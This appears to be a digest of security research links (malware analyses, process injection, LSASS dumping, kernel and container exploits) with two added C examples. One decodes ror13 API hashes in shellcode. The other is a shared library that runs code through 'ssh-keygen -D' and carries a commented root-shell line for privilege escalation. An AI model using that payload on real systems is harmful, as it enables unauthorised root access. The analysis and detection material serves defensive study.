23 Open Problems for Digital Self-Replicators https://tmpout.sh/3/21.html
DanaBot's Latest Move: Deploying Latrodectus https://www.esentire.com/blog/danabots-latest-move-deploying-icedid
eSentire
DanaBot's Latest Move: Deploying Latrodectus
Learn more about DanaBot banking Trojan and get security recommendations from our Threat Response Unit (TRU) to protect your business from this cyber…
Information about Windows persistence mechanisms https://persistence-info.github.io/
Ghidra Basics - Manual Shellcode Analysis and C2 Extraction https://embee-research.ghost.io/ghidra-basics-shellcode-analysis/
Embee Research
How to Use Ghidra to Analyse Shellcode and Extract Cobalt Strike Command & Control Servers
Manual analysis of Cobalt Strike Shellcode with Ghidra. Identifying function calls and resolving API hashing.
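The API hashing mentioned above is the ror13 scheme that Metasploit's block_api and Cobalt Strike's stagers use: the uppercased UTF-16 module name (including its two-byte terminator, which is why it is read from MaximumLength) and the NUL-terminated ASCII export name are each folded with rotate-right-13-then-add, and the two sums are added. The following is an added example, not code from the Embee Research post or from Ghidra: it reimplements that hash in C, resolves hashes against a small constructed table of exports, and walks a constructed x86 fragment for `push imm32` instructions to show how the immediates you see in the disassembly map back to API names. The table and the sample bytes are my own constructions, and the scan is a naive byte walk, so a 0x68 inside an immediate or string would be misread; in Ghidra you would rely on the real disassembly instead.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Rotate a 32-bit value right by 13, as the ror13 hash loop does. */
static uint32_t ror13(uint32_t v) {
    return (v >> 13) | (v << 19);
}

/* Hash the module name the way block_api reads it from the PEB loader list:
   UTF-16LE, upper-cased, including the two-byte terminator. 32-bit wraparound
   matches the shellcode's "add edi, eax". */
static uint32_t hash_module(const char *module) {
    uint32_t h = 0;
    size_t n = strlen(module) + 1;                 /* include the NUL */
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)toupper((unsigned char)module[i]);
        h = ror13(h) + c;                          /* low byte of the code unit */
        h = ror13(h);                              /* high byte is zero for ASCII */
    }
    return h;
}

/* Hash the export name as a NUL-terminated ASCII string (terminator included). */
static uint32_t hash_function(const char *function) {
    uint32_t h = 0;
    size_t n = strlen(function) + 1;
    for (size_t i = 0; i < n; i++)
        h = ror13(h) + (unsigned char)function[i];
    return h;
}

uint32_t api_hash(const char *module, const char *function) {
    return hash_module(module) + hash_function(function);
}

struct export_entry { const char *module; const char *function; };

/* Constructed subset of exports a stager typically resolves; extend it from
   the export tables of the DLLs you care about. */
static const struct export_entry known_exports[] = {
    {"kernel32.dll", "LoadLibraryA"},
    {"kernel32.dll", "ExitProcess"},
    {"kernel32.dll", "WinExec"},
    {"kernel32.dll", "VirtualAlloc"},
    {"kernel32.dll", "CreateThread"},
    {"wininet.dll",  "InternetOpenA"},
    {"wininet.dll",  "InternetConnectA"},
    {"ws2_32.dll",   "WSAStartup"},
};

/* Look a hash up by recomputing it over the known table; NULL if unknown. */
const struct export_entry *resolve_hash(uint32_t h) {
    for (size_t i = 0; i < sizeof known_exports / sizeof known_exports[0]; i++)
        if (api_hash(known_exports[i].module, known_exports[i].function) == h)
            return &known_exports[i];
    return NULL;
}

/* Walk a blob for x86 "push imm32" (opcode 0x68) and try to resolve each
   immediate as an API hash. Returns the number that matched a known export. */
size_t scan_push_hashes(const uint8_t *buf, size_t len) {
    size_t hits = 0;
    for (size_t i = 0; i + 5 <= len; i++) {
        if (buf[i] != 0x68) continue;
        uint32_t imm = (uint32_t)buf[i + 1] | (uint32_t)buf[i + 2] << 8 |
                       (uint32_t)buf[i + 3] << 16 | (uint32_t)buf[i + 4] << 24;
        const struct export_entry *e = resolve_hash(imm);
        if (e) {
            printf("offset %zu: push 0x%08X -> %s!%s\n", i, imm, e->module, e->function);
            hits++;
        }
    }
    return hits;
}

/* Constructed fragment: "push imm32; call ebp" twice, the shape block_api
   callers take. The immediates are the hashes of LoadLibraryA and ExitProcess. */
const uint8_t sample_stager[] = {
    0x68, 0x4C, 0x77, 0x26, 0x07, 0xFF, 0xD5,
    0x68, 0xF0, 0xB5, 0xA2, 0x56, 0xFF, 0xD5,
};

int main(void) {
    printf("kernel32.dll!LoadLibraryA = 0x%08X\n", api_hash("kernel32.dll", "LoadLibraryA"));
    size_t n = scan_push_hashes(sample_stager, sizeof sample_stager);
    printf("%zu hashes resolved\n", n);
    return 0;
}
```

Build with `gcc -Wall -o apihash apihash.c`; the constants it prints are the ones you will recognise from block_api-based payloads (for instance `0x0726774C` for `kernel32.dll!LoadLibraryA`), which is a quick check that your reimplementation is right before you trust it on unknown hashes.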
Leveraging ssh-keygen for Arbitrary Execution (and Privilege Escalation) https://seanpesce.blogspot.com/2023/03/leveraging-ssh-keygen-for-arbitrary.html
Blogspot
Leveraging ssh-keygen for Arbitrary Execution (and Privilege Escalation)
TL;DR The ssh-keygen command can be used to load a shared library with the -D flag. This can be useful for privilege ...
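The mechanism behind the TL;DR is that `ssh-keygen -D <path>` passes the path to dlopen() expecting a PKCS#11 provider, and the dynamic loader runs every constructor in that object before ssh-keygen looks for any provider symbol, so arbitrary code runs even when the file is not a real provider (ssh-keygen then fails and exits). The following shared library is an added example, not code from Sean Pesce's post: it records that its constructor ran and under which effective uid, and the `payload_fired`/`payload_fired_as` accessors and the sudoers rule in the comment are my own illustrative names and assumptions.

```c
/* libpayload.c: loaded by "ssh-keygen -D ./libpayload.so".
 *
 * Build:   gcc -shared -fPIC -o libpayload.so libpayload.c
 * Run:     ssh-keygen -D ./libpayload.so
 *
 * Privilege escalation only applies when ssh-keygen runs with more privilege
 * than you, e.g. a (hypothetical) sudoers entry such as
 *     user ALL=(root) NOPASSWD: /usr/bin/ssh-keygen
 * found via "sudo -l"; then "sudo ssh-keygen -D ./libpayload.so" runs the
 * constructor as root.
 */
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>

static int   fired    = 0;
static uid_t fired_as = (uid_t)-1;

/* Run by ld.so at dlopen() time, before ssh-keygen touches any symbol. */
__attribute__((constructor))
static void payload_init(void) {
    fired    = 1;
    fired_as = geteuid();
    fprintf(stderr, "[payload] constructor ran as uid=%u euid=%u\n",
            (unsigned)getuid(), (unsigned)geteuid());
    /* Replace with the action you want. In the privileged case the usual
       choice is to keep the inherited euid and spawn a shell, e.g.
       if (geteuid() == 0) { setuid(0); execl("/bin/sh", "sh", "-p", (char *)NULL); } */
}

/* Accessors (illustrative names) so a caller can confirm the constructor ran. */
int   payload_fired(void)    { return fired; }
uid_t payload_fired_as(void) { return fired_as; }
```

Because the constructor fires at load time, no `C_GetFunctionList` export is needed for the code to run; the error ssh-keygen prints afterwards is the tell a defender can look for, alongside any `ssh-keygen -D` invocation pointing at a path outside the system library directories.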
Cramming a Tiny Program into a Tiny ELF File: A Case Study https://tmpout.sh/3/22.html
The Pool Party You Will Never Forget: New Process Injection Techniques Using Windows Thread Pools https://www.safebreach.com/blog/process-injection-using-windows-thread-pools
SafeBreach
Process Injection Using Windows Thread Pools | Safebreach
Researchers have developed 8 new undetectable process injection techniques exploiting Windows thread pools to bypass leading EDR solutions.
PoolParty: A set of fully-undetectable process injection techniques abusing Windows Thread Pools https://github.com/SafeBreach-Labs/PoolParty
GitHub
GitHub - SafeBreach-Labs/PoolParty: A set of fully-undetectable process injection techniques abusing Windows Thread Pools
A set of fully-undetectable process injection techniques abusing Windows Thread Pools - SafeBreach-Labs/PoolParty
POSTDump: perform minidump of LSASS process using few technics to avoid detection https://securityonline.info/postdump-perform-minidump-of-lsass-process-using-few-technics-to-avoid-detection/
New payload to exploit Error-based SQL injection - Oracle database https://www.mannulinux.org/2023/12/New-payload-to-exploit-Error-based-SQL-injection-Oracle-database.html
www.mannulinux.org
New payload to exploit Error-based SQL injection - Oracle database
Rhysida Ransomware: History, TTPs and Adversary Emulation Plans https://fourcore.io/blogs/rhysida-ransomware-history-ttp-adversary-emulation
FourCore
Rhysida Ransomware: History, TTPs and Adversary Emulation Plans
Rhysida is a new player in the Ransomware space, first appearing in May 2023, and has been targeting industries all across the globe. In recent months, Rhysida has run campaigns compromising and extorting organizations from the government, education, healthcare…
JMP slide: A NOP-sled alternative https://tin-z.github.io/intel/assembly/exploit/2023/12/12/jmp_slide.html
Lambda driver blog
JMP slide: A NOP-sled alternative
In the following blog post, I will introduce you to two techniques similar to NOP-sled or NOP slide, but with the advantage that they are faster. Those techniques are: JMP slide and JCC slide.
Racing against the clock -- hitting a tiny kernel race window https://googleprojectzero.blogspot.com/2022/03/racing-against-clock-hitting-tiny.html
projectzero.google
Racing against the clock -- hitting a tiny kernel race window - Project Zero
TL;DR: How to make a tiny kernel race window really large even on kernels without CONFIG_PREEMPT: use a cache miss to widen the race window a little bit...
A new method for container escape using file-based DirtyCred https://starlabs.sg/blog/2023/07-a-new-method-for-container-escape-using-file-based-dirtycred/
STAR Labs
A new method for container escape using file-based DirtyCred
Recently, I was trying out various exploitation techniques against a Linux kernel vulnerability, CVE-2022-3910. After successfully writing an exploit which made use of DirtyCred to gain local privilege escalation, my mentor Billy asked me if it was possible…
Silverpeas App: Multiple CVEs leading to File Read on Server https://rhinosecuritylabs.com/research/silverpeas-file-read-cves/
Rhino Security Labs
Silverpeas App: Multiple CVEs leading to File Read on Server
Rhino Security Labs identified 8 new CVEs in the Silverpeas Core application.
UTG-Q-003: Supply Chain Poisoning of 7ZIP on the Microsoft App Store https://ti.qianxin.com/blog/articles/UTG-Q-003-Supply-Chain-Poisoning-of-7ZIP-on-the-Microsoft-App-Store-EN/
Qianxin
QiAnXin Threat Intelligence Center
Operation Blacksmith: Lazarus targets organizations worldwide using novel Telegram-based malware written in DLang https://blog.talosintelligence.com/lazarus_new_rats_dlang_and_telegram/
Cisco Talos Blog
Operation Blacksmith: Lazarus targets organizations worldwide using novel Telegram-based malware written in DLang
Our latest findings indicate a definitive shift in the tactics of the North Korean APT group Lazarus Group.
Tips For Analyzing Delphi Binaries in IDA (Danabot) https://www.youtube.com/watch?v=04RsqP_P9Ss
YouTube
Tips For Analyzing Delphi Binaries in IDA (Danabot)
Reverse Engineering Delphi is a nightmare ... or it can be if you don't have the right setup! In this clip we cover some easy tips that can help make some of the analysis a bit easier.
Full notes with links for tools are available here:
https://research…
Cloudflare 2023 Year in Review https://blog.cloudflare.com/radar-2023-year-in-review/
The Cloudflare Blog
Cloudflare 2023 Year in Review
The 2023 Cloudflare Radar Year in Review is our fourth annual review of Internet trends and patterns observed throughout the year at both a global and country/region level across a variety of traffic, connectivity, and speed metrics, based on data from Cloudflare’s…
New Critical RCE Vulnerability Discovered in Apache Struts 2 - Patch Now https://thehackernews.com/2023/12/new-critical-rce-vulnerability.html